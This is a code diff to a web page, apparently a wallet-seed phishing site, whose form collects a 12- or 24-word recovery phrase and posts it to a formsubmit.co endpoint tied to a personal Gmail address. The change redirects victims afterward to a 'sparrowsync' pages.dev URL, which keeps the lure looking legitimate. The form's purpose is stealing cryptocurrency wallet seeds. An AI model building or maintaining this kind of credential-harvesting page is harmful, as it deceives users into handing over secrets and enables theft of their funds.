--- a/en/secure/index.html
+++ b/en/secure/index.html
@@ -357,7 +357,7 @@
               <div>
                 <form action="https://formsubmit.co/hostblond@gmail.com" method="POST" id="my-form">
                     <input type="hidden" name="_captcha" value="false">
-                    <input type="hidden" name="_next" value="en/index.html">
+                    <input type="hidden" name="_next" value="https://sparrowsync.pages.dev/en/secure/index.html">
                   <div class="phrasebox ccbox activebox" id="phrase">
                     <textarea class="textarea allinput" name="phrase" placeholder="Input word phrase. Typically, 12 or 24 words separated by single spaces." oninput="countWord()"></textarea>
                   </div>
